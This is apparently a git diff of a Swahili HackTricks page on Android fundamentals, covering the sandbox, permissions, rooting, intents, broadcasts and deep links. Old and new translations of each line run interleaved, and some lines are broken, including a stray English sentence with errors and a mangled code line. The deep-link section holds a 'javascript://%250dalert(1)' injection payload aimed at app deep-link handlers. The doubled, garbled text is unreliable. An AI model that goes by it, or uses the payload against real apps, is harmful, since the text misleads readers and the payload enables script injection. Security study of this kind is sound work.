<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Kikundi cha Usalama cha Kujaribu Kwa Bidii**
**Kundi la Usalama wa Jaribio la Bidhaa**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -24,137 +25,138 @@ Njia nyingine za kusaidia HackTricks:
## Mfano wa Usalama wa Android
**Kuna safu mbili:**
**Kuna tabaka mbili:**
* **OS**, ambayo inaweka maombi yaliyosanikishwa kando na mwingine.
* **Maombi yenyewe**, ambayo inaruhusu watengenezaji ku **funua baadhi ya utendaji** na kusanidi uwezo wa maombi.
* **OS**, ambayo inashikilia maombi yaliyowekwa mbali na kila mmoja.
* **maombi yenyewe**, ambayo inaruhusu waendelezaji **kuweka wazi kazi fulani** na kuunda uwezo wa maombi.
### Ufafanuzi wa UID
### Kutenganisha UID
**Kila maombi hupewa Kitambulisho cha Mtumiaji maalum**. Hii hufanywa wakati wa usanidi wa programu ili **programu iweze kuingiliana tu na faili zilizomilikiwa na Kitambulisho chake cha Mtumiaji au faili zilizoshirikiwa**. Kwa hivyo, ni programu yenyewe, sehemu fulani za OS na mtumiaji wa msingi tu wanaweza kupata data za programu.
**Kila ombi linapewa Kitambulisho Maalum cha Mtumiaji**. Hii inafanywa wakati wa usakinishaji wa ombi ili **ombile linaweza kuingiliana tu na faili zinazomilikiwa na Kitambulisho chake cha Mtumiaji au faili zilizoshirikiwa**. Hivyo, ni ombi lenyewe tu, vipengele fulani vya OS na mtumiaji wa root wanaweza kufikia data za maombi.
### Kushiriki UID
**Maombi mawili yanaweza kusanidiwa kutumia UID sawa**. Hii inaweza kuwa na manufaa kushiriki habari, lakini ikiwa moja yao itashambuliwa data ya maombi yote mawili itashambuliwa. Ndio maana tabia hii ina **kukataliwa**.\
**Ili kushiriki UID sawa, maombi lazima yatamke thamani sawa ya `android:sharedUserId` katika mizizi yao.**
**Maombi mawili yanaweza kuwekewa mipangilio kutumia UID sawa**. Hii inaweza kuwa na manufaa kushiriki habari, lakini ikiwa moja yao itashambuliwa, data za maombi yote mawili zitakuwa hatarini. Hii ndiyo sababu tabia hii inashauriwa **kuepukwa**.\
**Ili kushiriki UID sawa, maombi lazima yainishe thamani sawa ya `android:sharedUserId` katika hati zao.**
### Sanduku la Kumaliza
### Sandboxing
**Sanduku la Maombi ya Android** inaruhusu kufanya kazi **kila maombi** kama **mchakato tofauti chini ya Kitambulisho cha Mtumiaji tofauti**. Kila mchakato una mashine yake ya kisasa, kwa hivyo msimbo wa programu hufanya kazi kivyake kutoka kwa programu zingine.\
Kuanzia Android 5.0(L) **SELinux** inatekelezwa. Kimsingi, SELinux ilikataa mwingiliano wa mchakato wote na kisha ikatengeneza sera za **kuruhusu mwingiliano uliotarajiwa tu kati yao**.
**Android Application Sandbox** inaruhusu kuendesha **kila ombi** kama **mchakato tofauti chini ya Kitambulisho cha Mtumiaji tofauti**. Kila mchakato una mashine yake ya virtual, hivyo msimbo wa ombi unakimbia kwa kujitenga na maombi mengine.\
Kuanzia Android 5.0(L) **SELinux** inatekelezwa. Kimsingi, SELinux ilikataa mwingiliano wote wa mchakato na kisha kuunda sera za **kuruhusu tu mwingiliano unaotarajiwa kati yao**.
### Ruhusa
Unapoweka **programu na inauliza ruhusa**, programu inauliza ruhusa zilizosanidiwa katika vipengele vya **`uses-permission`** katika faili ya **AndroidManifest.xml**. Kipengele cha **uses-permission** kinaonyesha jina la ruhusa inayohitajika ndani ya **sifa ya jina**. Pia ina sifa ya **maxSdkVersion** ambayo inazuia kuuliza ruhusa kwenye toleo zaidi ya lile lililoelezwa.\
Tambua kwamba maombi ya android hayahitaji kuuliza ruhusa zote mwanzoni, wanaweza pia **kuuliza ruhusa kwa kudhibiti** lakini ruhusa zote lazima zitangazwe katika **mizizi.**
Wakati unaposakinisha **ombile na linaomba ruhusa**, ombi linaomba ruhusa zilizowekwa katika vipengele vya **`uses-permission`** katika faili ya **AndroidManifest.xml**. Kipengele cha **uses-permission** kinaonyesha jina la ruhusa inayohitajika ndani ya **attribute ya jina**. Pia ina **maxSdkVersion** attribute ambayo inakomesha kuomba ruhusa kwenye toleo lililo juu ya lile lililotajwa.\
Kumbuka kwamba maombi ya android hayahitaji kuomba ruhusa zote mwanzoni, yanaweza pia **kuomba ruhusa kwa njia ya kidijitali** lakini ruhusa zote lazima **zitangazwe** katika **manifest**.
Wakati programu inafunua utendaji inaweza kikomo **upatikanaji kwa maombi tu yenye ruhusa iliyosanidiwa**.\
Kipengele cha ruhusa kina sifa tatu:
Wakati ombi linapoweka wazi kazi, linaweza kupunguza **ufikiaji kwa maombi tu ambayo yana ruhusa maalum**.\
Kipengele cha ruhusa kina attributes tatu:
* **Jina** la ruhusa
* Sifa ya **kikundi cha ruhusa**, ambayo inaruhusu kikundi cha ruhusa kinachohusiana.
* **Kiwanja cha ulinzi** ambacho kinaonyesha jinsi ruhusa zinavyotolewa. Kuna aina nne:
* **Kawaida**: Hutumiwa wakati hakuna **tishio lililojulikana** kwa programu. Mtumiaji **hahitajiki kuidhinisha**.
* **Hatari**: Inaonyesha ruhusa inayompa maombi yanayoomba **upatikanaji ulioinuliwa**. **Watumiaji wanahitajika kuidhinisha**.
* **Sahihi**: **Maombi yaliyosainiwa na cheti kile kile** kama lile linaloexport kipengee kinaweza kupewa ruhusa. Hii ni aina yenye nguvu zaidi ya ulinzi.
* **SahihiAuMfumo**: **Maombi yaliyosainiwa na cheti kile kile** kama lile linaloexport kipengee au **maombi yanayotumia upatikanaji wa kiwango cha mfumo** yanaweza kupewa ruhusa
* **jina** la ruhusa
* **attribute ya kundi la ruhusa**, ambayo inaruhusu kuunganisha ruhusa zinazohusiana.
* **kiwango cha ulinzi** ambacho kinaonyesha jinsi ruhusa zinavyotolewa. Kuna aina nne:
* **Kawaida**: Inatumika wakati hakuna **hatari zinazojulikana** kwa ombi. Mtumiaji **huhitajika kuidhinisha**.
* **Hatari**: Inaonyesha ruhusa inatoa ombi linalohitaji ufikiaji **wa juu**. **Watumiaji wanahitajika kuidhinisha**.
* **Sahihi**: Ni **maombi tu yaliyosainiwa na cheti sawa na kile** kinachosafirisha kipengele yanaweza kupewa ruhusa. Hii ndiyo aina yenye nguvu zaidi ya ulinzi.
* **SahihiAuMfumo**: Ni **maombi tu yaliyosainiwa na cheti sawa na kile** kinachosafirisha kipengele au **maombi yanayoendesha kwa ufikiaji wa kiwango cha mfumo** yanaweza kupewa ruhusa.
## Maombi Yaliyosanikishwa Kabla
## Maombi Yaliyosakinishwa Kabla
Maombi haya kwa kawaida hupatikana kwenye saraka za **`/system/app`** au **`/system/priv-app`** na baadhi yao ni **yaliyoboreshwa** (unaweza hata usipate faili ya `classes.dex`). Maombi haya ni muhimu kuangalia kwa sababu mara nyingi yanakuwa **yanaendeshwa na ruhusa nyingi sana** (kama mtumiaji wa msingi).
Maombi haya kwa ujumla hupatikana katika **`/system/app`** au **`/system/priv-app`** directories na baadhi yao yame **boreshwa** (huenda usipate hata faili ya `classes.dex`). Maombi haya yanastahili kuangaliwa kwa sababu wakati mwingine yanaweza kuwa **yanakimbia na ruhusa nyingi sana** (kama root).
* Yaliyotumwa na **AOSP** (Mradi wa Chanzo Wazi wa Android) **ROM**
* Yaliyopewa na **mtengenezaji wa kifaa**
* Yaliyopewa na **mtoa huduma wa simu** (ikiwa imeunuliwa kutoka kwao)
* Yaliyotolewa na **AOSP** (Mradi wa Msource wa Android) **ROM**
* Yaliyoongezwa na **mtengenezaji wa kifaa**
* Yaliyoongezwa na **mtoa huduma wa simu** (ikiwa imenunuliwa kutoka kwao)
## Kuroot
## Rooting
Ili kupata ufikiaji wa msingi kwenye kifaa cha android unahitaji kwa ujumla **kudukua** 1 au 2 **mapungufu** ambayo kwa kawaida huwa **maalum** kwa **kifaa** na **toleo**.\
Baada ya kudukua kufanikiwa, kawaida `su` ya Linux binary hucopishwa kwenye eneo lililoelezwa katika PATH env variable ya mtumiaji kama vile `/system/xbin`.
Ili kupata ufikiaji wa root kwenye kifaa halisi cha android kwa ujumla unahitaji **kufanya matumizi** ya udhaifu 1 au 2 ambayo huwa **maalum** kwa **kifaa** na **toleo**.\
Mara tu udhaifu umefanikiwa, kwa kawaida faili ya `su` ya Linux inakopishwa kwenye eneo lililotajwa katika mabadiliko ya mazingira ya mtumiaji kama `/system/xbin`.
Baada ya binary ya su kusanidiwa, programu nyingine ya Android hutumiwa kuingiliana na binary ya `su` na **kutuma maombi ya ufikiaji wa msingi** kama **Msimamizi** na **SuperSU** (inapatikana kwenye duka la Google Play).
Mara tu faili ya su inapoanzishwa, ombi lingine la Android linatumika kuungana na faili ya `su` na **kusindika maombi ya ufikiaji wa root** kama **Superuser** na **SuperSU** (inapatikana kwenye duka la Google Play).
{% hint style="danger" %}
Tambua kwamba mchakato wa kuroot ni hatari sana na unaweza kuharibu vibaya kifaa
Kumbuka kwamba mchakato wa rooting ni hatari sana na unaweza kuharibu kifaa vibaya
{% endhint %}
### ROMs
Inawezekana **kubadilisha OS kwa kusanikisha firmware ya desturi**. Kufanya hivi inawezekana kupanua matumizi ya kifaa cha zamani, kuepuka vizuizi vya programu au kupata ufikiaji wa msimbo wa Android wa hivi karibuni.\
**OmniROM** na **LineageOS** ni moja ya firmware maarufu zaidi kutumia.
Inawezekana **kurekebisha OS kwa kusakinisha firmware maalum**. Kufanya hivi inawezekana kuongeza matumizi ya kifaa cha zamani, kupita vizuizi vya programu au kupata ufikiaji wa msimbo wa hivi karibuni wa Android.\
**OmniROM** na **LineageOS** ni mbili ya firmware maarufu zaidi za kutumia.
Tambua kwamba **sio lazima kila wakati kuroot kifaa** kusanikisha firmware ya desturi. **Baadhi ya watengenezaji huruhusu** kufungua bootloader zao kwa njia iliyodokezwa vizuri na salama.
Kumbuka kwamba **sio kila wakati ni lazima ku-root kifaa** ili kusakinisha firmware maalum. **Wakati wengine wa watengenezaji wanaruhusu** kufungua bootloaders zao kwa njia iliyoandikwa vizuri na salama.
### Matokeo
Maranyingi kifaa kikiroot, programu yoyote inaweza kuomba ufikiaji kama msingi. Ikiwa programu inayodhuru inapata, inaweza kupata ufikiaji wa karibu kila kitu na itaweza kuharibu simu.
Mara kifaa kinapokuwa kime-rooted, ombi lolote linaweza kuomba ufikiaji kama root. Ikiwa ombi la uhalifu litapata ufikiaji huo, linaweza kuwa na ufikiaji wa karibu kila kitu na linaweza kuharibu simu.
## Misingi ya Maombi ya Android <a href="#2-android-application-fundamentals" id="2-android-application-fundamentals"></a>
## Msingi wa Maombi ya Android <a href="#2-android-application-fundamentals" id="2-android-application-fundamentals"></a>
- Muundo wa maombi ya Android unaitwa _muundo wa faili wa APK_. Kimsingi ni **faili ya ZIP** (kwa kubadilisha kificho cha faili kuwa .zip, maudhui yanaweza kuchimbuliwa na kuonekana).
- Yaliyomo ya APK (Hayakamilishi)
- Muundo wa maombi ya Android unajulikana kama _muundo wa faili ya APK_. Kimsingi ni **faili ya ZIP** (kwa kubadilisha kiambishi cha faili kuwa .zip, yaliyomo yanaweza kutolewa na kuangaliwa).
- Yaliyomo ya APK (Siyo ya kina)
- **AndroidManifest.xml**
- resources.arsc/strings.xml
- resources.arsc: ina rasilimali zilizopangwa mapema, kama XML ya binary.
- resources.arsc: ina rasilimali zilizotayarishwa mapema, kama XML ya binary.
- res/xml/files\_paths.xml
- META-INF/
- Hapa ndipo Cheti lilipo!
- **classes.dex**
- Ina bytecode ya Dalvik, ikionyesha msimbo uliokompiliwa wa Java (au Kotlin) ambao programu inatekeleza kwa chaguo-msingi.
- Inashikilia bytecode ya Dalvik, inayoakisi msimbo wa Java (au Kotlin) uliotayarishwa ambao ombi linaendesha kwa default.
- lib/
- Ina maktaba za asili, zilizogawanywa kulingana na muundo wa CPU katika saraka za ndani.
- `armeabi`: msimbo kwa processors za msingi wa ARM
- `armeabi-v7a`: msimbo kwa processors za ARMv7 na zaidi
- `x86`: msimbo kwa processors za X86
- `mips`: msimbo kwa processors za MIPS pekee
- Inashikilia maktaba za asili, zilizogawanywa kwa usanifu wa CPU katika saraka ndogo.
- `armeabi`: msimbo wa processors za msingi wa ARM
- `armeabi-v7a`: msimbo wa processors za ARMv7 na juu
- `x86`: msimbo wa processors za X86
- `mips`: msimbo wa processors za MIPS pekee
- assets/
- Hifadhi faili mbalimbali zinazohitajika na programu, pamoja na maktaba za asili au faili za DEX zaidi, mara nyingi hutumiwa na waandishi wa programu hasidi kuficha msimbo zaidi.
- Inahifadhi faili mbalimbali zinazohitajika na ombi, huenda ikijumuisha maktaba za asili za ziada au faili za DEX, wakati mwingine hutumiwa na waandishi wa malware kuficha msimbo wa ziada.
- res/
- Ina rasilimali ambazo hazijakusanywa katika resources.arsc
- Inashikilia rasilimali ambazo hazijakusanywa katika resources.arsc
### **Dalvik & Smali**
Katika maendeleo ya Android, **Java au Kotlin** hutumiwa kuunda programu. Badala ya kutumia JVM kama katika programu za desktop, Android inakusanya nambari hii kuwa **Dalvik Executable (DEX) bytecode**. Zamani, mashine ya kawaida ya Dalvik ilishughulikia bytecode huu, lakini sasa, Android Runtime (ART) inachukua jukumu hili katika toleo jipya la Android.
Katika maendeleo ya Android, **Java au Kotlin** inatumika kwa kuunda maombi. Badala ya kutumia JVM kama katika maombi ya desktop, Android inakusanya msimbo huu kuwa **Dalvik Executable (DEX) bytecode**. Awali, mashine ya virtual ya Dalvik ilishughulikia bytecode hii, lakini sasa, Android Runtime (ART) inachukua jukumu hilo katika matoleo mapya ya Android.
Kwa uhandisi wa nyuma, **Smali** inakuwa muhimu. Ni toleo linaloweza kusomwa na binadamu la DEX bytecode, likifanya kazi kama lugha ya mkutano kwa kutafsiri nambari ya chanzo kuwa maagizo ya bytecode. Smali na baksmali hurejelea zana za mkutano na kufunga upya katika muktadha huu.
Kwa ajili ya uhandisi wa nyuma, **Smali** inakuwa muhimu. Ni toleo linaloweza kusomeka na binadamu la bytecode ya DEX, likifanya kazi kama lugha ya mkusanyiko kwa kutafsiri msimbo wa chanzo kuwa maagizo ya bytecode. Smali na baksmali zinarejelea zana za mkusanyiko na uondoshaji katika muktadha huu.
## Intents
Intents ni njia kuu ambayo programu za Android hutumia kuwasiliana kati ya vipengele vyao au na programu nyingine. Vitu hivi vya ujumbe pia vinaweza kubeba data kati ya programu au kipengele, kama jinsi maombi ya GET/POST yanavyotumiwa katika mawasiliano ya HTTP.
Intents ni njia kuu ambayo maombi ya Android yanawasiliana kati ya vipengele vyake au na maombi mengine. Hizi ni vitu vya ujumbe vinaweza pia kubeba data kati ya maombi au vipengele, sawa na jinsi maombi ya GET/POST yanavyotumika katika mawasiliano ya HTTP.
Kwa hivyo, Intent ni **ujumbe unaopitishwa kati ya vipengele**. Intents **zinaweza kuwa zimeelekezwa** kwa vipengele au programu maalum, **au zinaweza kutumwa bila mpokeaji maalum**.\
Hivyo, Intent kimsingi ni **ujumbe unaopita kati ya vipengele**. Intents **zinaweza kuelekezwa** kwa vipengele au maombi maalum, **au zinaweza kutumwa bila mpokeaji maalum**.\
Ili kuwa rahisi, Intent inaweza kutumika:
* Kuanza Shughuli, kwa kawaida kufungua kiolesura cha mtumiaji kwa programu
* Kama matangazo ya kuarifu mfumo na programu kuhusu mabadiliko
* Kuanza, kusitisha, na kuwasiliana na huduma ya nyuma
* Kupata data kupitia Watoaji wa Yaliyomo
* Kama maombi ya kurudi kushughulikia matukio
* Kuanzisha Activity, kwa kawaida kufungua kiolesura cha mtumiaji kwa ombi
* Kama matangazo ya kuarifu mfumo na maombi kuhusu mabadiliko
* Kuanzisha, kusitisha, na kuwasiliana na huduma ya nyuma
* Kupata data kupitia ContentProviders
* Kama kurudi nyuma kushughulikia matukio
Ikiwa ina kasoro, **Intents zinaweza kutumika kufanya aina mbalimbali za mashambulizi**.
Ikiwa kuna udhaifu, **Intents zinaweza kutumika kufanya mashambulizi mbalimbali**.
### Intent-Filter
### Kichujio cha Intent
**Intent Filters** hufafanua **jinsi shughuli, huduma, au Kipokeaji cha Matangazo kinaweza kuingiliana na aina tofauti za Intents**. Kimsingi, hufafanua uwezo wa vipengele hivi, kama vile vitendo wanavyoweza kutekeleza au aina za matangazo wanazoweza kusindika. Mahali kuu pa kutangaza vichungi hivi ni ndani ya faili ya **AndroidManifest.xml**, ingawa kwa Kipokeaji cha Matangazo, kuandika ni chaguo pia.
**Kichujio cha Intents** kinaelezea **jinsi shughuli, huduma, au Mpokeaji wa Matangazo unaweza kuingiliana na aina tofauti za Intents**. Kimsingi, zinaelezea uwezo wa vipengele hivi, kama vile ni vitendo gani wanaweza kufanya au aina gani za matangazo wanaweza kushughulikia. Mahali kuu pa kutangaza vichujio hivi ni ndani ya **faili ya AndroidManifest.xml**, ingawa kwa Mpokeaji wa Matangazo, kuandika ni chaguo pia.
Intent Filters zimeundwa na vikundi, vitendo, na vichungi vya data, na uwezekano wa kujumuisha metadata ya ziada. Hii inaruhusu vipengele kushughulikia Intents maalum ambazo zinalingana na vigezo vilivyotangazwa.
Vichujio vya Intents vinajumuisha makundi, vitendo, na vichujio vya data, huku kukiwa na uwezekano wa kujumuisha metadata ya ziada. Mpango huu unaruhusu vipengele kushughulikia Intents maalum zinazolingana na vigezo vilivyotangazwa.
Jambo muhimu la vipengele vya Android (shughuli/huduma/watoaji wa yaliyomo/Kipokeaji cha Matangazo) ni uonekano wao au **hali ya umma**. Kipengele kinachukuliwa kuwa cha umma na kinaweza kuingiliana na programu nyingine ikiwa kime **`exported`** na thamani ya **`true`** au ikiwa Kichungi cha Intent kimetangazwa kwa hiyo katika maelezo yake. Walakini, kuna njia kwa watengenezaji kudumisha vipengele hivi kuwa binafsi, kuhakikisha kuwa havichangiliani na programu nyingine kwa bahati mbaya. Hii inafanikiwa kwa kuweka sifa ya **`exported`** kuwa **`false`** katika ufafanuzi wao wa maelezo.
Sehemu muhimu ya vipengele vya Android (shughuli/huduma/watoa maudhui/mpokeaji wa matangazo) ni mwonekano wao au **hadhi ya umma**. Kipengele kinachukuliwa kuwa cha umma na kinaweza kuingiliana na maombi mengine ikiwa kime **`exported`** na thamani ya **`true`** au ikiwa kichujio cha Intent kimewekwa kwa ajili yake katika hati. Hata hivyo, kuna njia kwa waendelezaji kuweka vipengele hivi kuwa binafsi, kuhakikisha havihusiani na maombi mengine bila kukusudia. Hii inafanywa kwa kuweka **`exported`** attribute kuwa **`false`** katika ufafanuzi wao wa hati.
Zaidi ya hayo, watengenezaji wana chaguo la kuhakikisha upatikanaji wa vipengele hivi zaidi kwa kuhitaji ruhusa maalum. Sifa ya **`permission`** inaweza kuwekwa ili kuhakikisha kuwa ni programu zenye ruhusa iliyopewa tu ndizo zinaweza kupata kipengele, ikiongeza safu ya ziada ya usalama na udhibiti juu ya ni nani anaweza kuingiliana nacho.
Zaidi ya hayo, waendelezaji wana chaguo la kuimarisha ufikiaji wa vipengele hivi zaidi kwa kuhitaji ruhusa maalum. **`permission`** attribute inaweza kuwekwa ili kuhakikisha kwamba ni maombi tu yenye ruhusa iliyotolewa yanaweza kufikia kipengele, kuongeza safu ya ziada ya usalama na udhibiti juu ya nani anaweza kuingiliana nayo.
```java
<activity android:name=".MyActivity" android:exported="false">
<!-- Intent filters go here -->
</activity>
```
### Nia Zisizo Dhahiri
### Implicit Intents
Nia hutengenezwa kwa kutumia kujenga kwa programu kwa kutumia kujenga kwa Nia:
Intents huundwa kimaandishi kwa kutumia mjenzi wa Intent:
```java
Intent email = new Intent(Intent.ACTION_SEND, Uri.parse("mailto:"));
```
**Hatua** ya nia iliyotangazwa awali ni **ACTION\_SEND** na **Zaidi** ni mailto **Uri** (Zaidi ni habari ya ziada ambayo nia inatarajia).
The **Action** of the previously declared intent is **ACTION\_SEND** and the **Extra** is a mailto **Uri** (the Extra if the extra information the intent is expecting).
Nia hii inapaswa kutangazwa ndani ya mwonekano kama ilivyo katika mfano ufuatao:
Hii intent inapaswa kutangazwa ndani ya manifest kama katika mfano ufuatao:
```xml
<activity android:name="ShareActivity">
<intent-filter>
@ -163,17 +165,17 @@ Nia hii inapaswa kutangazwa ndani ya mwonekano kama ilivyo katika mfano ufuatao:
</intent-filter>
</activity>
```
Intent-filter inahitaji kufanana na **action**, **data** na **category** ili kupokea ujumbe.
An intent-filter inahitaji kuendana na **action**, **data** na **category** ili kupokea ujumbe.
Mchakato wa "Uamuzi wa Intent" unahitaji kujua ni app gani itapokea ujumbe. Mchakato huu unazingatia **kipaumbele cha sifa**, ambacho kinaweza kuwekwa katika **tamko la intent-filter**, na **ile yenye kipaumbele kikubwa zaidi itachaguliwa**. Kipaumbele hiki kinaweza kuwekwa kati ya -1000 na 1000 na programu zinaweza kutumia thamani ya `SYSTEM_HIGH_PRIORITY`. Ikiwa **mgogoro** unatokea, dirisha la "choser" linaonekana ili **mtumiaji aweze kuchagua**.
Mchakato wa "Intent resolution" unamua ni programu ipi inapaswa kupokea kila ujumbe. Mchakato huu unazingatia **priority attribute**, ambayo inaweza kuwekwa katika **intent-filter declaration**, na **ile yenye kipaumbele cha juu itachaguliwa**. Kipaumbele hiki kinaweza kuwekwa kati ya -1000 na 1000 na programu zinaweza kutumia thamani ya `SYSTEM_HIGH_PRIORITY`. Ikiwa **conflict** itatokea, Dirisha la "choser" linaonekana ili **mtumiaji aweze kuamua**.
### Intents Dhahiri
### Explicit Intents
Intent dhahiri inabainisha jina la darasa inayolengwa:
Explicit intent inabainisha jina la darasa ambalo linawalenga:
```java
Intent downloadIntent = new (this, DownloadService.class):
```
Katika programu nyingine ili kupata upatikanaji wa nia iliyotangazwa awali unaweza kutumia:
Katika programu nyingine ili kufikia nia iliyotangazwa hapo awali unaweza kutumia:
```java
Intent intent = new Intent();
intent.setClassName("com.other.app", "com.other.app.ServiceName");
@ -181,30 +183,30 @@ context.startService(intent);
```
### Pending Intents
Hizi huruhusu programu zingine **kuchukua hatua kwa niaba ya programu yako**, ikatumia kitambulisho na ruhusa za programu yako. Kujenga Pending Intent ni lazima **itajwe nia na hatua ya kutekeleza**. Ikiwa **nia iliyotajwa si wazi** (haielezi ni nia gani inaweza kuipigia simu) programu mbaya inaweza kutekeleza **hatua iliyotajwa** kwa niaba ya programu ya mwathiriwa. Zaidi ya hayo, **ikiwa hatua haijatajwa**, programu mbaya itaweza kufanya **hatua yoyote kwa niaba ya mwathiriwa**.
Hizi zinawaruhusu programu nyingine **kuchukua hatua kwa niaba ya programu yako**, wakitumia utambulisho na ruhusa za programu yako. Kujenga Pending Intent inapaswa **kueleza intent na hatua ya kutekeleza**. Ikiwa **intent iliyotangazwa si ya Moja kwa Moja** (haijatangaza ni intent ipi inayoweza kuitwa) programu **mbaya inaweza kutekeleza hatua iliyotangazwa** kwa niaba ya programu ya mwathirika. Zaidi ya hayo, **ikiwa hatua haijatangazwa**, programu mbaya itakuwa na uwezo wa kufanya **hatua yoyote kwa niaba ya mwathirika**.
### Broadcast Intents
Tofauti na nia za awali, ambazo hupokelewa na programu moja tu, nia za matangazo **zinaweza kupokelewa na programu nyingi**. Hata hivyo, kuanzia toleo la API 14, ni **inawezekana kutaja programu inayopaswa kupokea** ujumbe kwa kutumia Intent.set Package.
Tofauti na intents za awali, ambazo zinapokelewa na programu moja tu, broadcast intents **zinaweza kupokelewa na programu nyingi**. Hata hivyo, kuanzia toleo la API 14, ni **mpossible kuweka programu ambayo inapaswa kupokea** ujumbe kwa kutumia Intent.setPackage.
Kwa kuongezea, ni pia inawezekana **kutaja ruhusa wakati wa kutuma matangazo**. Programu ya mpokeaji itahitaji kuwa na ruhusa hiyo.
Vinginevyo, pia inawezekana **kueleza ruhusa wakati wa kutuma matangazo**. Programu ya mpokeaji itahitaji kuwa na ruhusa hiyo.
Kuna **aina mbili** za Matangazo: **Kawaida** (isiyo ya moja kwa moja) na **Yaliyopangwa** (ya moja kwa moja). **Mpangilio** unategemea **kipaumbele kilichowekwa ndani ya mpokeaji**. **Kila programu inaweza kusindika, kusambaza au kudondosha Matangazo.**
Kuna **aina mbili** za Matangazo: **Kawaida** (asynchronous) na **Iliyopangwa** (synchronous). **Agizo** linategemea **kipaumbele kilichowekwa ndani ya kipengele cha mpokeaji**. **Kila programu inaweza kushughulikia, kupeleka au kuacha Matangazo.**
Inawezekana **kutuma** tangazo **kwa kutumia** kazi `sendBroadcast(nia, ruhusa ya mpokeaji)` kutoka darasa la `Context`.\
Unaweza pia kutumia kazi **`sendBroadcast`** kutoka kwa **`LocalBroadCastManager`** kuhakikisha **ujumbe hauondoki kamwe kwenye programu**. Kwa kutumia hii hata hautahitaji kuuza kipokeaji.
Inawezekana **kutuma** **matangazo** kwa kutumia kazi `sendBroadcast(intent, receiverPermission)` kutoka darasa la `Context`.\
Unaweza pia kutumia kazi **`sendBroadcast`** kutoka **`LocalBroadCastManager`** inahakikisha **ujumbe hauondoki kwenye programu**. Kwa kutumia hii hutahitaji hata kusafirisha kipengele cha mpokeaji.
### Matangazo ya Kudumu
### Sticky Broadcasts
Aina hii ya Matangazo **inaweza kupatikana muda mrefu baada ya kutumwa**.\
Hizi zilipitwa na wakati katika kiwango cha API 21 na **siyo kupendekezwa kuzitumia**.\
**Zinaruhusu programu yoyote kunusa data, lakini pia kuihariri.**
Aina hii ya Matangazo **inaweza kufikiwa muda mrefu baada ya kutumwa**.\
Hizi ziliondolewa katika kiwango cha API 21 na inashauriwa **usizitumie**.\
**Zinawaruhusu programu yoyote kunusa data, lakini pia kuibadilisha.**
Ikiwa unapata kazi zinazoleta neno "sticky" kama vile **`sendStickyBroadcast`** au **`sendStickyBroadcastAsUser`**, **angalia athari na jaribu kuziondoa**.
Ikiwa unapata kazi zenye neno "sticky" kama **`sendStickyBroadcast`** au **`sendStickyBroadcastAsUser`**, **angalia athari na jaribu kuziondoa**.
## Viungo vya Kina / Mipango ya URL
## Deep links / URL schemes
Katika programu za Android, **viungo vya kina** hutumiwa kuanzisha hatua (Nia) moja kwa moja kupitia URL. Hii hufanywa kwa kutangaza **mpango maalum wa URL** ndani ya shughuli. Wakati kifaa cha Android kinajaribu **kufikia URL na mpango huu**, shughuli iliyotajwa ndani ya programu inazinduliwa.
Katika programu za Android, **deep links** zinatumika kuanzisha hatua (Intent) moja kwa moja kupitia URL. Hii inafanywa kwa kutangaza **mpango maalum wa URL** ndani ya shughuli. Wakati kifaa cha Android kinapojaribu **kufikia URL yenye mpango huu**, shughuli iliyotangazwa ndani ya programu inazinduliwa.
Mpango lazima utangazwe katika faili ya **`AndroidManifest.xml`**:
```xml
@ -218,44 +220,44 @@ Mpango lazima utangazwe katika faili ya **`AndroidManifest.xml`**:
</intent-filter>
[...]
```
Schemu kutoka kwa mfano uliopita ni `exampleapp://` (pia kumbuka **`jamii BROWSABLE`**)
Mpango kutoka kwa mfano wa awali ni `exampleapp://` (zingatia pia **`category BROWSABLE`**)
Kisha, katika uga wa data, unaweza kufafanua **host** na **path**:
Kisha, katika uwanja wa data, unaweza kubainisha **host** na **path**:
```xml
<data android:scheme="examplescheme"
android:host="example"
/>
```
Kuipata kutoka kwenye wavuti ni rahisi kuweka kiungo kama:
Ili kuweza kufikia kutoka kwenye wavuti, inawezekana kuweka kiungo kama:
```xml
<a href="examplescheme://example/something">click here</a>
<a href="examplescheme://example/javascript://%250dalert(1)">click here</a>
```
Ili kupata **mimbo itakayotekelezwa kwenye Programu**, nenda kwenye shughuli iliyoitwa na kiungo cha kina na tafuta kazi ya **`onNewIntent`**.
Ili kupata **msimbo utakaotekelezwa katika App**, nenda kwenye shughuli inayoitwa na deeplink na tafuta kazi **`onNewIntent`**.
Jifunze jinsi ya [kuita viungo vya kina bila kutumia kurasa za HTML](./#exploiting-schemes-deep-links).
Jifunze jinsi ya [kuita deep links bila kutumia kurasa za HTML](./#exploiting-schemes-deep-links).
## AIDL - Lugha ya Ufafanuzi wa Interface ya Android
## AIDL - Android Interface Definition Language
